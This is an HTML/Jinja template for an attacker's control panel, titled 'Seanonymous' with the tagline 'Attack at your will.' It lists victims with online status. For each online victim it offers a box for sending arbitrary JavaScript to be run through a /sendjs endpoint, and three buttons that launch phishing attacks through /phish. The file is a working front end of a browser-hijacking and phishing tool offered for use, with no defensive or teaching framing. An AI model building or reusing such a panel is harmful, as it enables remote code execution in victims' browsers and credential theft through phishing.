<!DOCTYPE html>
<html lang="en" >
<head>
  <title>Seanonymous</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.3/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
</head>
<body style="background-image: url('https://mdbootstrap.com/img/Photos/Others/background.jpg'); background-repeat: no-repeat; background-size: revert; background-position: center center;">

<div class="container ">
<button  class=" btn btn-outline-secondary buttontext" onclick = "logout()" style ="margin-top: 2%;">Log Out</button>
 <h1 class="text-center display-3 title">Welcome, Seanonymous!</h1>
  <h4 class="text-center display-4 subtitle">Attack at your will.</h4>
    <table class = "table">
    <thead class="thead-dark">
      <tr>
        <th class="text-center">Name</th>
        <th class="text-center">Status</th>
        <th class="text-center">JS Attack</th>
        <th class="text-center">Phishing Attack</th>
      </tr>
    </thead>
    {% for item in data %}
    <tr>
        <td class="text-center rowtext" >{{ item[0] }}</td>
        {% if item[1]==0%}
            <td class="text-center rowtext" style = "background-color: red; " >Offline</td>
        {% else %}
            <td class="text-center rowtext" style = "background-color: green" >Online</td>
        {% endif %}
        <td class="text-center">
            <form class="input-group">
              <input id={{ item[0] }} type="text" class="form-control" aria-label="Text input with segmented dropdown button">
              <div class="input-group-append    ">
                  {% if item[1]==0%}
                        <button type="reset" class="btn btn-outline-secondary buttontext"  onclick="call_javascript({{ item[0] }})" disabled>Execute</button>
                  {% else %}
                        <button type="reset" class="btn btn-outline-secondary buttontext" onclick="call_javascript({{ item[0] }})">Execute</button>
                  {% endif %}
              </div>
            </form>
        </td>
        <td class="text-center">
            <div class="btn-group" role="group" aria-label="Basic example">
                {% if item[1]==0%}
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},1)" disabled>Phish #1</button>
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},2)" disabled>Phish #2</button>
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},3)" disabled>Phish #3</button>
                {% else %}
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},1)">Phish #1</button>
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},2)">Phish #2</button>
                    <button type="button" class="btn btn-outline-secondary buttontext" onclick="call_phishing({{ item[0] }},3)">Phish #3</button>
                {% endif %}
            </div>
        </td>
    </tr>

    {% endfor %}

    </table>
</div>

<script>

        function logout() {
        $.ajax({url: "/logout",
            type: "post",
        success: function(response){
            console.log(response);
        },
        error: function(error){
            console.log(error)
        }});
    }
    function call_javascript(person) {
        $.ajax({url: "/sendjs",
            type: "post",
            data: {id: person.id,
                   js: person.value},
        success: function(response){
            console.log(response);
        },
        error: function(error){
            console.log(error)
        }});
    }
    function call_phishing(id, attackNumber){
        $.ajax({url: "/phish",
            type: "post",
            data: {id: id.id,
                   number: attackNumber},
        success: function(response){
            console.log(response);
        },
        error: function(error){
            console.log(error)
        }});


    }
</script>
<style>
   .rowtext{
       color: black;
       font-family: Arial;
       font-size: 18px;
       font-weight: bolder;
          }
   .buttontext{
              color: black;
       font-family: Arial;
   }
    .title{
        padding-top: 0;
    }
    .subtitle{
        padding-bottom: 1%;
    }
</style>
</body>
</html>
